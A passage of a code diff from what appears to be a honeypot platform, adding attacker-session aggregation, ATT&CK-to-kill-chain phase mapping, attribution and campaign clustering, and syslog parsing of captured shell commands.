if tags:
pending.extend(tags)
if len(pending) >= batch_size:
inserted += await _flush(repo, pending, dry_run)
pending = []
if pending:
inserted += await _flush(repo, pending, dry_run)
elapsed = time.monotonic() - started
console.print(
f"source=command rows={rows_seen} commands={cmds_seen} "
f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
)
async def _backfill_canaries(
repo: Any,
tagger: Any,
*,
cutoff: datetime,
dry_run: bool,
batch_size: int,
) -> None:
from decnet.ttp.base import TaggerEvent
started = time.monotonic()
rows_seen = 0
inserted = 0
pending: list[Any] = []
async for trigger in repo.iter_canary_triggers_since(cutoff):
rows_seen += 1
event = TaggerEvent(
source_kind="canary_fingerprint",
source_id=trigger.uuid,
attacker_uuid=trigger.attacker_id,
identity_uuid=None,
session_id=None,
decky_id=None,
payload={
"token_uuid": trigger.token_uuid,
"src_ip": trigger.src_ip,
"ua_signature": trigger.user_agent or "",
"user_agent": trigger.user_agent,
"request_path": trigger.request_path,
"dns_qname": trigger.dns_qname,
"headers": trigger.headers(),
},
)
tags = await tagger.tag(event)
if tags:
pending.extend(tags)
if len(pending) >= batch_size:
inserted += await _flush(repo, pending, dry_run)
pending = []
if pending:
inserted += await _flush(repo, pending, dry_run)
elapsed = time.monotonic() - started
console.print(
f"source=canary rows={rows_seen} inserted={inserted} "
f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
)
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
if dry_run:
return 0
return int(await repo.insert_tags(tags))

View File

@@ -11,7 +11,7 @@ import signal
import subprocess # nosec B404 import subprocess # nosec B404
import sys import sys
from pathlib import Path from pathlib import Path
from typing import Optional from typing import Any, Callable, Optional
import typer import typer
from rich.console import Console from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
return None return None
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]: def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
"""Return the microservice registry for health-check and relaunch. """Return the microservice registry for health-check and relaunch.
On agents these run as systemd units invoking /usr/local/bin/decnet, On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
def _swarmctl_base_url(url: Optional[str]) -> str: def _swarmctl_base_url(url: Optional[str]) -> str:
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL) return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0): def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):

View File

@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
except KeyboardInterrupt: except KeyboardInterrupt:
console.print("\n[yellow]Reuse correlator stopped.[/]") console.print("\n[yellow]Reuse correlator stopped.[/]")
@app.command(name="attribution")
def attribution(
multi_actor_tick_secs: float = typer.Option(
60.0, "--multi-actor-tick", "-t",
help=(
"Cross-primitive multi_actor correlator tick interval (seconds). "
"Walks attribution_state for identities flagged on >= 2 "
"primitives and emits attribution.profile.multi_actor_suspected."
),
),
daemon: bool = typer.Option(
False, "--daemon", "-d",
help="Detach to background as a daemon process",
),
) -> None:
"""Attribution engine v0 — per-(identity, primitive) state machine.
Subscribes to ``attacker.observation.>`` and, for each event,
ensures a stub identity row, runs the merger over the full
per-(identity, primitive) observation series, upserts the
derived state, and publishes
``attribution.profile.state_changed`` only on transition.
Periodic tick fires
``attribution.profile.multi_actor_suspected`` when >= 2
primitives flag the same identity.
Closes DEBT-051. Bright-line scope: behavioural coherence and
drift only — never persona attribution to natural persons.
"""
import asyncio
from decnet.correlation.attribution_worker import (
run_attribution_loop,
)
from decnet.web.dependencies import repo
if daemon:
log.info(
"attribution worker daemonizing tick=%s",
multi_actor_tick_secs,
)
_utils._daemonize()
log.info(
"attribution worker command invoked tick=%s",
multi_actor_tick_secs,
)
console.print(
f"[bold cyan]Attribution engine starting[/] "
f"multi_actor_tick={multi_actor_tick_secs}s"
)
console.print("[dim]Press Ctrl+C to stop[/]")
async def _run() -> None:
await repo.initialize()
await run_attribution_loop(
repo,
multi_actor_tick_secs=multi_actor_tick_secs,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Attribution engine stopped.[/]")
@app.command(name="clusterer") @app.command(name="clusterer")
def clusterer( def clusterer(
poll_interval_secs: float = typer.Option( poll_interval_secs: float = typer.Option(
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
asyncio.run(_run()) asyncio.run(_run())
except KeyboardInterrupt: except KeyboardInterrupt:
console.print("\n[yellow]Campaign clusterer stopped.[/]") console.print("\n[yellow]Campaign clusterer stopped.[/]")
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
# is colocated there, mirroring the per-feature CLI split used by
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
# ``decnet ttp`` because the command name is unchanged.

View File

@@ -66,7 +66,10 @@ def cluster_identities(
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list} return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures: def from_identity_row(
row: dict[str, Any],
ttp_decky_phases: list[dict[str, Any]] | None = None,
) -> IdentityFeatures:
"""Project an ``AttackerIdentity`` projection row dict into an """Project an ``AttackerIdentity`` projection row dict into an
:class:`IdentityFeatures`. :class:`IdentityFeatures`.
@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
(JSON list[str] or null). (JSON list[str] or null).
Phase-handoff fields stay empty until the production-row adapter *ttp_decky_phases* is the optional per-identity payload from
learns to mine logs for per-decky phase sequences (TODO.md :meth:`BaseRepository.list_ttp_decky_phases` — one row per
"production-side payload + C2 + commands joins"). Without those, ``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
the campaign clusterer falls back to shared-infra + temporal provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
overlap + cohort signals on production data; the fixture path populates :attr:`IdentityFeatures.first_phase_per_decky` /
exercises the full feature set via :func:`from_synthetic_identity`. ``last_phase_per_decky`` / ``first_seen_per_decky`` /
``last_seen_per_decky` so the production phase-handoff edge
finally fires. The synthetic fixture path
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
emitting UKC directly.
""" """
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
payload_hashes = _parse_json_list(row.get("payload_simhashes")) payload_hashes = _parse_json_list(row.get("payload_simhashes"))
c2_endpoints = _parse_json_list(row.get("c2_endpoints")) c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
first_phase_per_decky: dict[str, str] = {}
last_phase_per_decky: dict[str, str] = {}
first_seen_per_decky: dict[str, float] = {}
last_seen_per_decky: dict[str, float] = {}
decky_set: set[str] = set()
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
# the FIRST observation per decky, plain assignment captures the
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
# phase is pre-target / unobservable) are dropped — they should
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
for entry in ttp_decky_phases or []:
decky = entry.get("decky_id")
tactic = entry.get("tactic")
created_at_ts = entry.get("created_at_ts")
if not isinstance(decky, str) or not isinstance(tactic, str):
continue
phase = tactic_to_ukc_phase(tactic)
if phase is None:
continue
ts = float(created_at_ts) if isinstance(
created_at_ts, (int, float)) else 0.0
decky_set.add(decky)
first_phase_per_decky.setdefault(decky, phase.value)
last_phase_per_decky[decky] = phase.value
first_seen_per_decky.setdefault(decky, ts)
last_seen_per_decky[decky] = ts
return IdentityFeatures( return IdentityFeatures(
identity_uuid=row["uuid"], identity_uuid=row["uuid"],
payload_hashes=frozenset(payload_hashes), payload_hashes=frozenset(payload_hashes),
c2_endpoints=frozenset(c2_endpoints), c2_endpoints=frozenset(c2_endpoints),
decky_set=frozenset(decky_set),
first_phase_per_decky=first_phase_per_decky,
last_phase_per_decky=last_phase_per_decky,
first_seen_per_decky=first_seen_per_decky,
last_seen_per_decky=last_seen_per_decky,
) )
@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
# merged out — their winner is the active row and gets clustered # merged out — their winner is the active row and gets clustered
# on its own. This keeps the campaign graph from double-counting. # on its own. This keeps the campaign graph from double-counting.
active_rows = [r for r in rows if not r.get("merged_into_uuid")] active_rows = [r for r in rows if not r.get("merged_into_uuid")]
# Pull TTP-derived per-decky phase observations per identity
# (E.3.15). Failures here are non-fatal — the clusterer falls
# back to the empty phase-handoff signal, same as the legacy
# behavior, so a partial repo doesn't take the worker down.
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
for r in active_rows:
try:
decky_phases_by_identity[r["uuid"]] = (
await repo.list_ttp_decky_phases(r["uuid"])
)
except Exception: # noqa: BLE001
log.warning(
"campaign clusterer: list_ttp_decky_phases failed "
"for identity %s; phase-handoff edge inert",
r["uuid"],
)
decky_phases_by_identity[r["uuid"]] = []
feature_list: list[IdentityFeatures] = [ feature_list: list[IdentityFeatures] = [
from_identity_row(r) for r in active_rows from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
for r in active_rows
] ]
row_by_uuid: dict[str, dict[str, Any]] = { row_by_uuid: dict[str, dict[str, Any]] = {
r["uuid"]: r for r in active_rows r["uuid"]: r for r in active_rows

View File

@@ -342,7 +342,7 @@ def combined_campaign_weight(
# ─── Adapter for synthetic-fixture tests ──────────────────────────────────── # ─── Adapter for synthetic-fixture tests ────────────────────────────────────
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def] def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``. """Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
Treats one ``SyntheticAttacker`` as one identity — adequate for Treats one ``SyntheticAttacker`` as one identity — adequate for

View File

@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
t.cancel() t.cancel()
if heartbeat_task is not None: if heartbeat_task is not None:
heartbeat_task.cancel() heartbeat_task.cancel()
for t in (*wake_tasks, heartbeat_task): for task in (*wake_tasks, heartbeat_task):
if t is None: if task is None:
continue continue
with contextlib.suppress(asyncio.CancelledError, Exception): with contextlib.suppress(asyncio.CancelledError, Exception):
await t await task
if bus is not None: if bus is not None:
with contextlib.suppress(Exception): with contextlib.suppress(Exception):
await bus.close() await bus.close()

View File

@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
breaks the clusterer tick — the columns just stay stale until the breaks the clusterer tick — the columns just stay stale until the
next pass.""" next pass."""
summaries = extract_fp_summaries(member_rows) summaries = extract_fp_summaries(member_rows)
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
try: try:
await repo.update_identity_fingerprints(identity_uuid, **summaries) await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
except Exception: # noqa: BLE001 except Exception: # noqa: BLE001
log.exception( log.exception(
"clusterer: failed to roll up fingerprints for identity=%s", "clusterer: failed to roll up fingerprints for identity=%s",

View File

@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
# ─── Adapter for the synthetic-corpus tests ───────────────────────────────── # ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def] def from_synthetic(att) -> Observation:
"""Build an :class:`Observation` from a ``SyntheticAttacker``. """Build an :class:`Observation` from a ``SyntheticAttacker``.
Lives here so test code doesn't import the factory shape into the Lives here so test code doesn't import the factory shape into the

View File

@@ -15,6 +15,7 @@ emits no events for unobservable phases.
from __future__ import annotations from __future__ import annotations
from enum import Enum from enum import Enum
from typing import Final
class UKCPhase(str, Enum): class UKCPhase(str, Enum):
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
if phase in STAGE_THROUGH: if phase in STAGE_THROUGH:
return "through" return "through"
return "out" return "out"
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
# Adding additional ICS tactics is a one-line addition. See
# TTP_TAGGING.md "UKC bridge".
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
# Enterprise
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
"TA0001": UKCPhase.DELIVERY, # Initial Access
"TA0002": UKCPhase.EXECUTION, # Execution
"TA0003": UKCPhase.PERSISTENCE, # Persistence
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
"TA0007": UKCPhase.DISCOVERY, # Discovery
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
"TA0009": UKCPhase.COLLECTION, # Collection
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
"TA0040": UKCPhase.IMPACT, # Impact
# ICS — first-class projection so MQTT / Conpot / Modbus tags
# don't drop out of campaign rollups when the clusterer projects
# tactic to phase. ICS uses an independent tactic-ID range.
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
"TA0105": UKCPhase.IMPACT, # ICS: Impact
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
}
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
# DECNET does not currently load. They're exempt from the
# enterprise-bundle validation in :func:`validate_against_attack_bundle`
# so a startup check doesn't false-fail the moment ICS rules are wired.
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
{"TA0100", "TA0102", "TA0105", "TA0106"}
)
def validate_against_attack_bundle() -> None:
"""Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
typoed tactic ID surfaces as a fail-closed boot, not a silent
miss in campaign rollups.
"""
from decnet.ttp.attack_stix import assert_known_tactic_ids
assert_known_tactic_ids(
list(ATTACK_TACTIC_TO_UKC.keys()),
source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
exempt=set(_NON_ENTERPRISE_TACTICS),
)
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
"""Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
Returns ``None`` for unknown tactics. The map is closed-over the
enterprise + ICS tactics referenced by the rule pack; a tactic
outside that set is a contributor bug, not a runtime miss.
"""
return ATTACK_TACTIC_TO_UKC.get(tactic)
# Inverse map, built once at import time. Several enterprise tactics
# would collide (e.g. both TA0009 and TA0100 map to COLLECTION); the
# enterprise tactic wins because it's listed first in
# ATTACK_TACTIC_TO_UKC, which dict comprehension preserves via
# last-write semantics — so we iterate in reverse to keep the FIRST
# occurrence per phase. Pre-target phases (RECONNAISSANCE,
# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
# not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
# TTP tags must never assign them, so projecting back to a tactic
# is undefined. See TTP_TAGGING.md §UKC bridge.
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
phase: tactic
for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
}
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
"""Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
``None`` because no rule emits them, so the inverse is
undefined by design. The CDD test in E.2.9 pins which phases
are lossy.
"""
return _UKC_TO_TACTIC.get(phase)

View File

@@ -115,11 +115,11 @@ async def run_clusterer_loop(
t.cancel() t.cancel()
if heartbeat_task is not None: if heartbeat_task is not None:
heartbeat_task.cancel() heartbeat_task.cancel()
for t in (*wake_tasks, heartbeat_task): for task in (*wake_tasks, heartbeat_task):
if t is None: if task is None:
continue continue
with contextlib.suppress(asyncio.CancelledError, Exception): with contextlib.suppress(asyncio.CancelledError, Exception):
await t await task
if bus is not None: if bus is not None:
with contextlib.suppress(Exception): with contextlib.suppress(Exception):
await bus.close() await bus.close()

View File

@@ -18,6 +18,7 @@ from datetime import datetime
from pathlib import Path from pathlib import Path
from typing import Any, Callable, Optional from typing import Any, Callable, Optional
from decnet.artifacts.shards import find_shard_with_sid
from decnet.bus import topics as _topics from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus from decnet.bus.factory import get_bus
from decnet.bus.publish import ( from decnet.bus.publish import (
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
) )
_RL_MAX_ENTRIES: int = 10_000 _RL_MAX_ENTRIES: int = 10_000
# APP-NAMEs we never want to see in the ingestion stream — native unix
# daemons that share a container with a DECNET service. Their logs are
# noise: sshd's "Failed password for root from X" duplicates the
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
# again, and CRON/systemd/etc. say nothing about attacker behavior.
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
_DROP_APPS: frozenset[str] = frozenset(
a.strip()
for a in os.environ.get(
"DECNET_COLLECTOR_DROP_APPS",
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
).split(",")
if a.strip()
)
_rl_lock: threading.Lock = threading.Lock() _rl_lock: threading.Lock = threading.Lock()
_rl_last: dict[tuple[str, str, str, str], float] = {} _rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
def _should_ingest(parsed: dict[str, Any]) -> bool: def _should_ingest(parsed: dict[str, Any]) -> bool:
""" """
Return True if this parsed event should be written to the JSON ingestion Return True if this parsed event should be written to the JSON ingestion
stream. Rate-limited connection-lifecycle events return False when another stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
event with the same (attacker_ip, decky, service, event_type) was emitted rate-limits connection-lifecycle events within a dedup window.
inside the dedup window.
""" """
if parsed.get("service", "") in _DROP_APPS:
return False
event_type = parsed.get("event_type", "") event_type = parsed.get("event_type", "")
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES: if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
return True return True
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
with _rl_lock: with _rl_lock:
_rl_last.clear() _rl_last.clear()
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
#
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
# producing that topic — the rule pack therefore never fired on live
# traffic. The aggregator below indexes shell-command events
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
#
# Memory bound: each attacker_ip's deque is capped by a TTL eviction
# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
)
# Body of a bash PROMPT_COMMAND CMD line:
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
# Splits into the structured fields the inspector renders + the
# residual ``cmd=`` value (which may itself contain spaces — preserve
# everything after ``cmd=`` as one token, do NOT word-split).
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
def _parse_cmd_msg(msg: str) -> dict[str, str]:
"""Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
Returns the empty dict on a non-CMD msg. ``command`` carries the
full post-``cmd=`` rest, including any embedded whitespace —
tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
everything after the first space.
"""
if not msg.startswith("CMD "):
return {}
head, sep, cmd_rest = msg[4:].partition("cmd=")
out: dict[str, str] = {}
for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
out[k] = v
if sep:
out["command"] = cmd_rest
return out
def _parse_iso_ts(value: str) -> Optional[datetime]:
"""Best-effort ISO-8601 parse for parsed event timestamps.
The collector's parser stamps ``timestamp`` either as the original
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
``fromisoformat`` after a space→T swap. Returns None if neither
shape parses — the aggregator skips events it can't time-stamp.
"""
if not value:
return None
candidates = (value, value.replace(" ", "T"))
for cand in candidates:
try:
return datetime.fromisoformat(cand)
except ValueError:
continue
return None
class _SessionAggregator:
"""Per-attacker_ip command index that emits ``attacker.session.ended``.
Thread-safe — :meth:`add_event` is called from the per-container
stream threads. Internal state is protected by a single lock; the
publish fan-out happens inside the lock for simplicity (the
downstream publish_fn is the thread-safe marshaller from
:mod:`decnet.bus.publish`, which is non-blocking).
"""
def __init__(
self,
publish_fn: Callable[[str, dict[str, Any], str], None],
*,
ttl_sec: float = _SESSION_AGG_TTL_SEC,
) -> None:
self._publish = publish_fn
self._ttl = ttl_sec
self._lock = threading.Lock()
# attacker_ip → list of (timestamp, parsed_event) tuples.
# Stored as a list rather than a deque so the ``in_window``
# filter can index linearly; the per-attacker volume is
# bounded by the TTL and by typical session size (≤ a few
# hundred commands) so this stays cheap.
self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
def add_event(self, parsed: dict[str, Any]) -> None:
"""Index a parsed event. Emits on ``session_recorded``."""
event_type = parsed.get("event_type", "")
attacker_ip = parsed.get("attacker_ip") or ""
if not attacker_ip or attacker_ip == "Unknown":
return
ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
if ts is None:
return
with self._lock:
self._evict_expired(ts)
if event_type == "command":
self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
return
if event_type == "session_recorded":
self._emit_session(parsed, attacker_ip, ts)
def _evict_expired(self, now: datetime) -> None:
"""Drop commands older than ``self._ttl`` seconds."""
cutoff = now.timestamp() - self._ttl
for ip, entries in list(self._cmds.items()):
kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
if kept:
self._cmds[ip] = kept
else:
del self._cmds[ip]
def _emit_session(
self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
) -> None:
"""Build an ``attacker.session.ended`` envelope and publish it.
Slices the per-IP deque to commands whose timestamp falls
inside ``[ended_at - duration_s, ended_at]``. Commands stay in
the deque after the slice — the TTL eviction is the only path
that drops them, so two back-to-back sessions for the same IP
share the visible window without losing rows.
"""
fields = parsed.get("fields", {}) or {}
duration_raw = fields.get("duration_s") or "0"
try:
duration_s = float(duration_raw)
except (TypeError, ValueError):
duration_s = 0.0
sid = str(fields.get("sid") or "")
service = str(fields.get("service") or parsed.get("service") or "")
decky = parsed.get("decky") or ""
commands_window = self._cmds.get(attacker_ip, [])
cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
commands: list[dict[str, Any]] = []
for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
if cmd_ts.timestamp() < cutoff_lo:
continue
cmd_fields = cmd_parsed.get("fields", {}) or {}
# Pull structured uid/user/src/pwd/command from the bash
# msg body. The inspector renders these as separate
# key/value rows, which is much friendlier than dumping
# the raw ``CMD uid=0 user=... cmd=...`` string into a
# single ``command_text`` blob.
parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
cmd_text = (
cmd_fields.get("command")
or cmd_fields.get("cmd")
or parsed_kv.get("command")
or cmd_parsed.get("msg", "")
)
entry: dict[str, Any] = {
"id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
"command_text": str(cmd_text),
"ts": cmd_ts.isoformat(),
"decky": cmd_parsed.get("decky", ""),
"service": cmd_parsed.get("service", ""),
}
for key in ("uid", "user", "src", "pwd"):
value = parsed_kv.get(key) or cmd_fields.get(key)
if value is not None:
entry[key] = value
commands.append(entry)
# Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
# session-ended handler in the profiler worker) don't each have to
# disk-reach independently. Shard fields can be malformed or the
# transcripts dir may not exist yet — find_shard_with_sid returns
# None in those cases and we publish ``shard_path: None`` so the
# consumer skips honestly. Additive field; existing TTP consumers
# ignore it.
shard_path: str | None = None
resolve_error: str | None = None
if sid and decky and service:
try:
resolved = find_shard_with_sid(decky, service, sid)
except (ValueError, OSError, PermissionError) as exc:
resolve_error = f"{type(exc).__name__}: {exc}"
resolved = None
if resolved is not None:
shard_path = str(resolved)
if shard_path is None and sid:
# Loud-by-default — the BEHAVE-SHELL handler will skip
# session.ended events with shard_path=None, so a silent
# miss here means the profiler panel never hydrates. Surface
# the most common failure modes inline so the operator can
# diagnose without grepping decnet/artifacts/shards.py.
#
# 1. ARTIFACTS_ROOT not readable by the collector's user
# (perm 0750 decnet:decnet vs. User=anti without
# SupplementaryGroups=decnet).
# 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
# 3. sessrec hasn't flushed the shard for this sid yet
# (collector tick won the race; next tick recovers).
logger.warning(
"collector: shard_path=None decky=%s service=%s sid=%s "
"(error=%s) — profiler will skip this session.ended; "
"check ARTIFACTS_ROOT perms / service whitelist",
decky, service, sid, resolve_error or "shard not found",
)
payload: dict[str, Any] = {
"session_id": sid or None,
"attacker_uuid": None, # consumer resolves via repo
"attacker_ip": attacker_ip,
"decky_id": decky,
"service": service,
"ended_at": ended_at.isoformat(),
"duration_s": duration_s,
"commands": commands,
"shard_path": shard_path,
}
topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
try:
self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
except Exception as exc: # noqa: BLE001
logger.debug(
"collector: session.ended publish failed: %s", exc,
)
# ─── RFC 5424 parser ────────────────────────────────────────────────────────── # ─── RFC 5424 parser ──────────────────────────────────────────────────────────
_RFC5424_RE = re.compile( _RFC5424_RE = re.compile(
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
r"(\S+) " # 4: MSGID (event_type) r"(\S+) " # 4: MSGID (event_type)
r"(.+)$", # 5: SD element + optional MSG r"(.+)$", # 5: SD element + optional MSG
) )
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
# That inner RFC 5424 line lands on the container's stdout, where the
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
# sees ``event_type == "-"`` while the real MSGID (``command``) is
# inside the body. We detect that case and re-extract the inner
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
# ``event_type == "command"`` plus the real source hostname.
#
# Anchored on an ISO-8601 timestamp at the head of the body so we
# don't false-match free-form prose like "Connection from 1.2.3.4".
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL) _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"') _PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip") _IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
ts_raw, decky, service, event_type, sd_rest = m.groups() ts_raw, decky, service, event_type, sd_rest = m.groups()
fields: dict[str, str] = {} fields: dict[str, str] = {}
msg: str = ""
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
# stdout envelope around the inner ``logger --msgid command`` line).
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
# remainder so downstream extraction sees the real header.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
msg: str = ""
if sd_rest.startswith("-"): if sd_rest.startswith("-"):
msg = sd_rest[1:].lstrip() msg = sd_rest[1:].lstrip()
elif sd_rest.startswith("["): elif sd_rest.startswith("["):
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
if block: if block:
for k, v in _PARAM_RE.findall(block.group(1)): for k, v in _PARAM_RE.findall(block.group(1)):
